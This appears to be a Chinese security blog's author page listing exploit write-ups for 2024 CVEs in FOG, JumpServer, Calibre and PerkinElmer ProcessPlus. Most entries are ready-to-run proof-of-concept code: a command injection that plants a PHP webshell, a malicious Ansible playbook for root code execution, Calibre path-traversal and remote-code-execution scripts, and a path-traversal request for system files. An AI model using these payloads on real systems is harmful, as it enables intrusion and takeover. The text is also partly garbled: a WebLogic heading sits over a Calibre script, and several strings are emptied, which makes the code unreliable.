d0glun 发布的文章 - 瓜皮博客_d0glun

FOG命令注入漏洞(CVE-2024-39914) FOG命令注入漏洞(CVE-2024-39914)漏洞描述FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下，FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响，该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。#!/usr/bin/env python3 import socket import sys rhost = '192.168.15.5' rport = 80 webshell = 'darek.php' #lol payload = f"""POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+)&type=pdf HTTP/1.1\r\nHost: \r\nContent-Length: 21\r\nUser-Agent: ToxicPotato\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\nfogguiuser=fog&nojson=2""" with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: try: sock.connect((rhost, rport)) except: print(f'Could not reach ') sys.exit(1) sock.sendall(payload.encode()) data = sock.recv(1024) print(data.decode())

Jumpserver任意文件写入致RCE漏洞(CVE-2024-40629) Jumpserver任意文件写入致RCE漏洞(CVE-2024-40629)漏洞说明攻击者可利用 Ansible playbook 写入任意文件，从而导致 Celery 容器中的远程代码执行 （RCE）。Celery 容器以 root 身份运行并具有数据库访问权限，允许攻击者窃取主机的所有机密、创建具有管理员权限的新 JumpServer 帐户或以其他方式操作数据库。详情拥有低权限账号的攻击者至少拥有一台主机的访问权限，并可以访问作业中心功能。可以通过以下步骤进行复制：● 打开 Workbench > Job > Template 部分，创建一个包含以下内容的恶意 playbook 模板： - hosts: all tasks: - name: create python file on remote host that executes a command shell: | echo 'from ansible.release import __version__, __author__ __import__("os").system("id > /tmp/pwnd")' > /tmp/rce - name: write that file at a known location that gets reloaded at the next ansible execution fetch: src: /tmp/rce dest: /opt/py3/lib/python3.11/site-packages/ansible/__init__.py flat: true Playbook模板2 - hosts: all tasks: - name: read file from local host = celery using file lookup plugin ansible.builtin.debug: msg: "}" ● ● 打开 Workbench > Job > Job list 部分，使用上面创建的 playbook 模板创建一个新作业。● 运行作业，然后运行任何其他 playbook，将执行该命令补丁 安全版本：● 3.10.12 版● 4.0.0 版解决方法建议升级安全版本。升级后，攻击者将无法执行任意代码。

WebLogic远程代码执行漏洞(CVE-2024-21006) WebLogic远程代码执行漏洞(CVE-2024-21006)#! /usr/bin/env python3 # Ldwk # PoC for: CVE-2024-6781 import json import sys import requests _target = "http://localhost:8080" # SET ME _book_id = 1 # ensure book_id exists def exploit(path): r = requests.post( f"/cdb/cmd/export", headers=, json=["extra_file", _book_id, path, ""], ) try: print(r.json()["result"]) except Exception: print(r.text) if __name__ == "__main__": exploit("..\\..\\..\\Calibre Settings\\gui.json")

Calibre远程代码执行漏洞(CVE-2024-6782) Calibre远程代码执行漏洞(CVE-2024-6782)#! /usr/bin/env python3 # PoC for: CVE-2024-6782 # Description: Unauthenticated remote code execution in 6.9.0 <= calibre <= 7.14.0 import json import sys import requests _target = "http://localhost:8080" def exploit(cmd): r = requests.post( f"/cdb/cmd/list", headers=, json=[ ["template"], "", # sortby: leave empty "", # ascending: leave empty "", # search_text: leave empty, set to all 1, # limit results f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '']).decode()", # payload ], ) try: print(list(r.json()["result"]["data"]["template"].values())[0]) except Exception as e: print(r.text) if __name__ == "__main__": exploit("whami")

PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)pocGET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 Host: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Ldwk: YmllY2hhb2xlc2I= Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1